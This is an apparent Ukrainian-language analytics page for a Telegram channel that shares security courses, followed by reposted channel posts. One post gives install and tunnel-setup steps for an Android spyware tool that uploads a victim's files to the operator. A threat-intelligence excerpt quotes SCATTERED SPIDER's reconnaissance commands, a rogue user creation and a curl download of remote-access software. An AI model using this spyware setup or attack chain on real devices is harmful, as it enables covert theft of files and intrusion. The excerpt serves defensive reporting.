uk
Feedback
All Security Engineering Courses

All Security Engineering Courses

Відкрити в Telegram

This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!

Показати більше

📈 Аналітичний огляд Telegram-каналу All Security Engineering Courses

Канал All Security Engineering Courses (@allsecurityengineeringcourses) у мовному сегменті Англійська є активним учасником. На даний момент спільнота об'єднує 19 216 підписників, посідаючи 6 651 місце в категорії Технології та додатки та 34 061 місце у регіоні Росія.

📊 Показники аудиторії та динаміка

З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 19 216 підписників.

За останніми даними від 19 вересня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 99, а за останні 24 години на 0, загальне охоплення залишається високим.

  • Статус верифікації: Не верифікований
  • Рівень залученості (ER): Середній показник залученості аудиторії становить 16.35%. Протягом перших 24 годин після публікації контент зазвичай збирає N/A% реакцій від загальної кількості підписників.
  • Охоплення публікацій: В середньому кожен допис отримує 0 переглядів. Протягом першої доби публікація в середньому набирає 0 переглядів.
  • Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 0.
  • Тематичні інтереси: Контент зосереджений навколо ключових тем, таких як git, strace, github, linux, docker.

📝 Опис та контентна політика

Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...

Завдяки високій частоті оновлень (останні дані отримано 20 вересня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.

19 216
Підписники
Немає даних24 години
+287 днів
+9930 днів
Архів дописів
@WickHelps-ntroduction Windows Malware Development.rar1282.35 MB

Repost from N/a
Simple Android spyware that uploads all files from user selected paths. pkg update && pkg upgrade -y pkg install git pv unzip
Simple Android spyware that uploads all files from user selected paths.
pkg update && pkg upgrade -y
pkg install git pv unzip -y
git clone http://github.com/7wp81x/Spim3
cd Spim3/
bash spim3.sh

Example usage:

- open new session
cd Files/
php -S 127.0.0.1:8000 > /dev/null 2>&1 &

- Tunnel using cloudflared
cloudflared tunnel --url 127.0.0.1:8080

- Tunnel using ngrok
ngrok http 8080

- on main session:

bash spim3.sh

- Enter the url from ngrok/cloudflare.
- Enter paths, if done then Enter done.
- Compile /sdcard/Spim3/decompiled Using apktool_M
Termux tools are for educational use only. For more information about this tool, visit the GitHub link.

Repost from N/a
Antisyphon: Offensive Development w/ Greg Hatcher & John Stigerwalt
Antisyphon: Offensive Development w/ Greg Hatcher & John Stigerwalt

HackTricks - AWS Red Team Expert (ARTE).part01.rar1996.80 MB

Offensive Development w Greg Hatcher & John Stigerwalt.rar3250.61 MB

https://xakep.ru/2011/12/06/57950/ SQLMap - SQL Injections are easy

https://trivy.dev/v0.17.2/ A Simple and Comprehensive Vulnerability Scanner for Containers and other Artifacts, Suitable for CI.

US companies letting go of US employees!
US companies letting go of US employees!

So that was a lie
So that was a lie

This repo contains information about EDRs that can be useful during red team exercise. https://github.com/Mr-Un1k0d3r/EDRs/ #статьи_ссылки_scripts

After establishing an initial connection, SCATTERED SPIDER executed the ping command against several domains within and outside of the target organization, likely to identify their level of access and visibility within the network. The adversary then ran several variations of the nltest command to identify domain controllers (DCs) of interest and the wmic command to identify programs currently installed on the host. Finally, the adversary established persistence by creating a new user on the host and attempting to download FleetDeck remote access software. nltest /dclist:<domain> nltest /domain_trusts wmic product get name, version net user [Redacted-Username] [Redacted-Password] curl -L hxxps://agent.fleetdeck[.]io/M9zydGyGHrUXkhZeB9mj4?win -o chrome.exe